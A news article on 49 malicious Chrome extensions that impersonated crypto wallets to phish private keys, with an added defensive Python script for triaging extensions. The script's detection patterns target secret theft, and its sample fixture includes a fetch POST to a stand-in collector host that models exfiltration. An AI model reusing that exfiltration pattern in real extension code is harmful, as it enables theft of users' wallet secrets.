Malicious code was identified in 49 Chrome extensions available in the Chrome Web Store. Attackers used these malicious Chrome extensions to steal crypto wallet keys before they were removed from Google’s online store.
49 Chrome Extensions Culled
Google removed 49 Chrome extensions from its Chrome Web Store because they contained malicious code. These malicious Chrome extensions mimicked real cryptocurrency wallet apps to steal the private keys to users’ crypto wallets. This is not the first time that Google has culled malicious extensions from its Chrome Web Store. In February, Google removed over 500 extensions from its online store.
The malicious Chrome extensions were discovered by security researchers at MyCrypto, an IT service management company in the cryptocurrency space. Harry Denley, Director of Security at MyCrypto, explained in a blog post published yesterday: “Essentially, the extensions are phishing for secrets – mnemonic phrases, private keys, and keystore files. Once the user has entered them, the extension sends an HTTP POST request to its backend, where the bad actors receive the secrets and empty the accounts.”
The malicious extensions functioned almost identically to the real crypto wallet apps they were mimicking. However, the information victims entered to access existing crypto wallets or to configure new wallets was sent to a Google Form or to the attackers’ own servers instead of the legitimate apps. The researchers discovered that although 14 different servers were involved, all of them appeared to belong to the same attacker(s). Furthermore, research indicated that the attackers were possibly located in Russia.
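The behaviour described above (a wallet-branded extension that collects secrets and sends them to a Google Form or an unrelated server) can be turned into a simple triage check over an unpacked extension. The following Python sketch is an added example, not code from MyCrypto or from the article; the function name, the expected-hosts allowlist, and the sample files are constructed for illustration.

```python
import json
import re
from urllib.parse import urlparse

# Wallet brands the article says were impersonated.
BRANDS = ["ledger", "trezor", "jaxx", "electrum", "myetherwallet",
          "metamask", "exodus", "keepkey"]
# Secret types the article says the extensions phished for.
SECRET_RE = re.compile(r"mnemonic|private[\s_-]?key|keystore", re.I)
URL_RE = re.compile(r"https?://[^\s\"'`<>)]+")

def triage_extension(files, expected_hosts=()):
    """files: {relative path: text} of an unpacked extension.
    expected_hosts: hosts the analyst knows the genuine wallet uses (assumption)."""
    manifest = json.loads(files.get("manifest.json", "{}"))
    name = str(manifest.get("name", "")).lower()
    brand = next((b for b in BRANDS if b in name), None)
    secret_files, hosts, form_files = set(), set(), set()
    for path, text in files.items():
        if not path.endswith((".js", ".html")):
            continue
        if SECRET_RE.search(text):
            secret_files.add(path)
        for url in URL_RE.findall(text):
            parsed = urlparse(url)
            host = (parsed.hostname or "").lower()
            hosts.add(host)
            if host == "docs.google.com" and parsed.path.startswith("/forms"):
                form_files.add(path)
    unexpected = sorted(h for h in hosts if h and h not in expected_hosts)
    return {
        "claims_brand": brand,
        "secret_files": sorted(secret_files),
        "unexpected_hosts": unexpected,
        "google_form_files": sorted(form_files),
        # Wallet-branded + handles secrets + unknown hosts => manual review.
        "needs_review": bool(brand and secret_files and unexpected),
    }

# Constructed sample input (not taken from any real extension).
SAMPLE = {
    "manifest.json": '{"name": "Example MetaMask Helper", "version": "1.0"}',
    "popup.html": '<input id="mnemonic" placeholder="Enter mnemonic phrase">',
    "popup.js": 'fetch("https://collector.example.invalid/submit", {method: "POST"});',
    "alt.js": 'const f = "https://docs.google.com/forms/d/e/PLACEHOLDER/formResponse";',
}

if __name__ == "__main__":
    print(json.dumps(triage_extension(SAMPLE, {"wallet-vendor.example"}), indent=2))
```

This is a heuristic for prioritising manual review: a clean result does not prove an extension is safe, and obfuscated or remotely loaded code will not be caught by string matching.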
Crypto Wallets Targeted
The malicious Chrome extensions mimicked the crypto wallet apps belonging to Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey. Strangely, however, the attacker did not take funds from victims’ wallets immediately after receiving the stolen keys. As reported by ZDNet, Denley apparently thinks the attackers were only interested in stealing funds from high-value accounts. The other possible explanation provided by Denley is that the attacker hadn’t discovered how to automate the thefts and therefore needed to access each account manually.
Unfortunately, crypto wallets are vulnerable to attack and do not come with insurance. Consequently, it is difficult for victims to recover funds once they have been stolen. The best approach is to prevent funds from being stolen in the first place by using strong passwords and two-factor authentication. It is also important to apply the latest app updates to ensure that the wallets are kept safe.
Another safety option is to not store all cryptocurrency in one wallet. It may be best to spread the risk. A further option is to use cold wallets instead of hot wallets. Hot wallets are connected to the internet, whereas cold wallets are not. Thus, hot wallets are more susceptible to hackers.